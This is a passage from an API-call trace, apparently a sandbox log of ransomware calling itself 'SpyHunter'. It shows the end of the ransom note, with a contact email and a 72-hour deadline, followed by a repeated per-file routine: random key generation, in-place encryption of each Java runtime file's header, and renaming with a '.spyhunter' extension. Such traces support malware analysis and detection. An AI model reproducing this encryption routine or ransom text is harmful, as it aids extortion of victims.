SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0171.829] WriteFile (in: hFile=0x178, lpBuffer=0x270e47f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e5a8, lpOverlapped=0x0 | out: lpBuffer=0x270e47f*, lpNumberOfBytesWritten=0x270e5a8*=0x127, lpOverlapped=0x0) returned 1 [0171.830] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0171.830] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e5a8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e5a8*=0x2ac, lpOverlapped=0x0) returned 1 [0171.830] CloseHandle (hObject=0x178) returned 1 [0171.830] GetProcessHeap () returned 0x2c0000 [0171.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfd30 | out: hHeap=0x2c0000) returned 1 [0171.830] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e548 | out: pbBuffer=0x270e548) returned 1 [0171.830] GetProcessHeap () returned 0x2c0000 [0171.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e540*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e540*=0x30) returned 1 [0171.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.833] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar") returned 54 [0171.833] StrStrW (lpFirst="zipfs.jar", lpSrch=".txt") returned 0x0 [0171.833] GetProcessHeap () returned 0x2c0000 [0171.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.833] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e504, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e504*=0x2800, lpOverlapped=0x0) returned 1 [0171.906] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.906] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e504, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e504*=0x2800, lpOverlapped=0x0) returned 1 [0171.906] GetProcessHeap () returned 0x2c0000 [0171.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.906] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.906] WriteFile (in: hFile=0x178, lpBuffer=0x270e544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e504, lpOverlapped=0x0 | out: lpBuffer=0x270e544*, lpNumberOfBytesWritten=0x270e504*=0x4, lpOverlapped=0x0) returned 1 [0171.907] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e504, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e504*=0x30, lpOverlapped=0x0) returned 1 [0171.907] CloseHandle (hObject=0x178) returned 1 [0171.907] GetProcessHeap () returned 0x2c0000 [0171.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.907] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.spyhunter") returned 64 [0171.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar.spyhunter")) returned 1 [0171.908] GetProcessHeap () returned 0x2c0000 [0171.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.908] GetProcessHeap () returned 0x2c0000 [0171.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.909] GetProcessHeap () returned 0x2c0000 [0171.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26738 | out: hHeap=0x2c0000) returned 1 [0171.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e540 | out: pbBuffer=0x270e540) returned 1 [0171.909] GetProcessHeap () returned 0x2c0000 [0171.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e538*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e538*=0x30) returned 1 [0171.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.910] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar") returned 58 [0171.910] StrStrW (lpFirst="sunmscapi.jar", lpSrch=".txt") returned 0x0 [0171.910] GetProcessHeap () returned 0x2c0000 [0171.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.910] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4fc*=0x2800, lpOverlapped=0x0) returned 1 [0171.911] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.911] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4fc*=0x2800, lpOverlapped=0x0) returned 1 [0171.911] GetProcessHeap () returned 0x2c0000 [0171.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.912] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.912] WriteFile (in: hFile=0x178, lpBuffer=0x270e53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4fc, lpOverlapped=0x0 | out: lpBuffer=0x270e53c*, lpNumberOfBytesWritten=0x270e4fc*=0x4, lpOverlapped=0x0) returned 1 [0171.912] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4fc*=0x30, lpOverlapped=0x0) returned 1 [0171.912] CloseHandle (hObject=0x178) returned 1 [0171.913] GetProcessHeap () returned 0x2c0000 [0171.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.913] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.spyhunter") returned 68 [0171.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunmscapi.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunmscapi.jar.spyhunter")) returned 1 [0171.914] GetProcessHeap () returned 0x2c0000 [0171.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.914] GetProcessHeap () returned 0x2c0000 [0171.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.914] GetProcessHeap () returned 0x2c0000 [0171.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5ff40 | out: hHeap=0x2c0000) returned 1 [0171.914] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e540 | out: pbBuffer=0x270e540) returned 1 [0171.914] GetProcessHeap () returned 0x2c0000 [0171.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.914] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e538*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e538*=0x30) returned 1 [0171.914] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.915] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar") returned 64 [0171.915] StrStrW (lpFirst="sunjce_provider.jar", lpSrch=".txt") returned 0x0 [0171.915] GetProcessHeap () returned 0x2c0000 [0171.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.916] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4fc*=0x2800, lpOverlapped=0x0) returned 1 [0171.933] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.934] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4fc*=0x2800, lpOverlapped=0x0) returned 1 [0171.934] GetProcessHeap () returned 0x2c0000 [0171.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.934] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.934] WriteFile (in: hFile=0x178, lpBuffer=0x270e53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4fc, lpOverlapped=0x0 | out: lpBuffer=0x270e53c*, lpNumberOfBytesWritten=0x270e4fc*=0x4, lpOverlapped=0x0) returned 1 [0171.935] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4fc*=0x30, lpOverlapped=0x0) returned 1 [0171.935] CloseHandle (hObject=0x178) returned 1 [0171.935] GetProcessHeap () returned 0x2c0000 [0171.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.935] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.spyhunter") returned 74 [0171.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunjce_provider.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunjce_provider.jar.spyhunter")) returned 1 [0171.936] GetProcessHeap () returned 0x2c0000 [0171.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.936] GetProcessHeap () returned 0x2c0000 [0171.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.936] GetProcessHeap () returned 0x2c0000 [0171.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03dc8 | out: hHeap=0x2c0000) returned 1 [0171.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e538 | out: pbBuffer=0x270e538) returned 1 [0171.937] GetProcessHeap () returned 0x2c0000 [0171.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.937] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e530*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e530*=0x30) returned 1 [0171.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.938] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar") returned 54 [0171.938] StrStrW (lpFirst="sunec.jar", lpSrch=".txt") returned 0x0 [0171.938] GetProcessHeap () returned 0x2c0000 [0171.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.938] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4f4*=0x2800, lpOverlapped=0x0) returned 1 [0171.941] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.941] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4f4*=0x2800, lpOverlapped=0x0) returned 1 [0171.941] GetProcessHeap () returned 0x2c0000 [0171.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.941] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.941] WriteFile (in: hFile=0x178, lpBuffer=0x270e534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4f4, lpOverlapped=0x0 | out: lpBuffer=0x270e534*, lpNumberOfBytesWritten=0x270e4f4*=0x4, lpOverlapped=0x0) returned 1 [0171.942] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4f4*=0x30, lpOverlapped=0x0) returned 1 [0171.942] CloseHandle (hObject=0x178) returned 1 [0171.942] GetProcessHeap () returned 0x2c0000 [0171.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.942] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.spyhunter") returned 64 [0171.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar.spyhunter")) returned 1 [0171.943] GetProcessHeap () returned 0x2c0000 [0171.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.943] GetProcessHeap () returned 0x2c0000 [0171.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.943] GetProcessHeap () returned 0x2c0000 [0171.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3cc8 | out: hHeap=0x2c0000) returned 1 [0171.944] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e538 | out: pbBuffer=0x270e538) returned 1 [0171.944] GetProcessHeap () returned 0x2c0000 [0171.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.944] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e530*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e530*=0x30) returned 1 [0171.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.945] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index") returned 55 [0171.945] StrStrW (lpFirst="meta-index", lpSrch=".txt") returned 0x0 [0171.945] GetProcessHeap () returned 0x2c0000 [0171.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.945] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4f4*=0x33d, lpOverlapped=0x0) returned 1 [0171.969] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffcc3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.969] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x33d, lpNumberOfBytesWritten=0x270e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4f4*=0x33d, lpOverlapped=0x0) returned 1 [0171.969] GetProcessHeap () returned 0x2c0000 [0171.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.969] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.969] WriteFile (in: hFile=0x178, lpBuffer=0x270e534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4f4, lpOverlapped=0x0 | out: lpBuffer=0x270e534*, lpNumberOfBytesWritten=0x270e4f4*=0x4, lpOverlapped=0x0) returned 1 [0171.969] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4f4*=0x30, lpOverlapped=0x0) returned 1 [0171.969] CloseHandle (hObject=0x178) returned 1 [0171.970] GetProcessHeap () returned 0x2c0000 [0171.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.970] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index.spyhunter") returned 65 [0171.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\meta-index.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\meta-index.spyhunter")) returned 1 [0171.971] GetProcessHeap () returned 0x2c0000 [0171.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.971] GetProcessHeap () returned 0x2c0000 [0171.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.971] GetProcessHeap () returned 0x2c0000 [0171.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3c10 | out: hHeap=0x2c0000) returned 1 [0171.971] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e530 | out: pbBuffer=0x270e530) returned 1 [0171.971] GetProcessHeap () returned 0x2c0000 [0171.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.971] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e528*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e528*=0x30) returned 1 [0171.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.972] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar") returned 51 [0171.972] StrStrW (lpFirst="deploy.jar", lpSrch=".txt") returned 0x0 [0171.972] GetProcessHeap () returned 0x2c0000 [0171.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.972] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4ec*=0x2800, lpOverlapped=0x0) returned 1 [0171.974] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.974] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4ec*=0x2800, lpOverlapped=0x0) returned 1 [0171.974] GetProcessHeap () returned 0x2c0000 [0171.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.974] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.974] WriteFile (in: hFile=0x178, lpBuffer=0x270e52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4ec, lpOverlapped=0x0 | out: lpBuffer=0x270e52c*, lpNumberOfBytesWritten=0x270e4ec*=0x4, lpOverlapped=0x0) returned 1 [0171.983] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4ec*=0x30, lpOverlapped=0x0) returned 1 [0171.984] CloseHandle (hObject=0x178) returned 1 [0172.051] GetProcessHeap () returned 0x2c0000 [0172.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.051] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.spyhunter") returned 61 [0172.051] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy.jar.spyhunter")) returned 1 [0172.052] GetProcessHeap () returned 0x2c0000 [0172.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.052] GetProcessHeap () returned 0x2c0000 [0172.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0172.052] GetProcessHeap () returned 0x2c0000 [0172.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 